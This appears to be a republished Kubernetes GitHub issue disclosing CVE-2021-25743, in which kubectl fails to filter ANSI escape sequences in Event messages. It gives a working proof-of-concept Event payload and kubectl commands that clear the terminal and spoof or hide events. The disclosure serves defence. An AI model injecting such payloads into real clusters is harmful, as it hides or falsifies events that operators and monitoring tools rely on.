Headline

CVE-2021-25743: ANSI escape characters in kubectl output are not being filtered · Issue #101695 · kubernetes/kubernetes

kubectl does not neutralize escape, meta or control sequences contained in the raw data it outputs to a terminal. This includes but is not limited to the unstructured string fields in objects such as Events.

2 years ago

CVE

Open in Source

#ubuntu #linux #debian #js #git #kubernetes

It is a security issue, but after contacting [email protected], Tim and the team confirmed that they are comfortable posting it publicly.

What happened:

Kubernetes doesn’t sanitize the ‘message’ field in the Event JSON objects.
Notice that this is relevant only to JSON objects, not YAML objects.
By creating new event, we can insert ANSI escape characters inside the “message” field, like:

"\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done"

This an example of such JSON request:

{
    "apiVersion": "v1",
    "involvedObject": {
        "kind": "Node",
        "name": "node01",
        "uid": "node01"
    },
    "kind": "Event",
    "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done",
    "metadata": {
        "name": "spoofEvent",
        "namespace": "default"
    },
    "source": {
        "component": "kubelet",
        "host": "node01"
    },
    "type": "Normal"
}

The codes:
\u001b[2J -> Clean the screen and history
\u001b[3J -> Clean the entire screen and delete all lines saved in the scrollback buffer
\u001b[1;1H -> Moves the cursor position to row 1, column 1 (beginning).
\u001b[m -> Set the colors
\u001b[60C -> Move the cursor forward 60 steps
\u001b[1;1m -> Set the text colors to white

The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events.

What you expected to happen:

The ANSI escape characters will be filtered so they couldn’t affect the terminal (i.e. using embeded ANSI colors won’t do anything to the terminal).
Or maybe some message that says that you can’t use ANSI escape characters.

How to reproduce it (as minimally and precisely as possible):

Run this code:

kubectl create -f - <<EOF
{
    "apiVersion": "v1",
    "involvedObject": {
        "kind": "Node",
        "name": "node01",
        "uid": "node01"
    },
    "kind": "Event",
    "message": "\u001b[2J\u001b[3J\u001b[1;1H\u001b[m spoofed \u001b[60C\u001b[1;0m. Done",
    "metadata": {
        "name": "spoofEvent",
        "namespace": "default"
    },
    "source": {
        "component": "kubelet",
        "host": "node01"
    },
    "type": "Normal"
}
EOF

It will create a new event.

Run kubectl get events, you will see that the screen was clear, you will get a “spoof” message, and all the rest events or columns were gone.

Anything else we need to know?:

It might look like a low severity issue, but there are other variety of things we can do, from DoS by using colors to hide all the events, changing the title of the terminal window, and spoof the data.

It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn’t have to be only the Kubernetes events. There might be other vulnerable objects that we didn’t find or other systems that create new objects that count on this mechanism.

ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVE-2003-0069).

Environment:

Kubernetes version (use kubectl version):

Client Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.4", GitCommit:"e87da0bd6e03ec3fea7933c4b5263d151aafd07c", GitTreeState:"clean", BuildDate:"2021-02-18T16:12:00Z", GoVersion:"go1.15.8", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"20", GitVersion:"v1.20.2", GitCommit:"faecb196815e248d3ecfb03c680a4507229c2a56", GitTreeState:"clean", BuildDate:"2021-01-13T13:20:00Z", GoVersion:"go1.15.5", Compiler:"gc", Platform:"linux/amd64"}

Cloud provider or hardware configuration:
OS (e.g: cat /etc/os-release):

NAME="Ubuntu" VERSION="16.04.7 LTS (Xenial Xerus)" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 16.04.7 LTS" VERSION_ID="16.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/" VERSION_CODENAME=xenial UBUNTU_CODENAME=xenial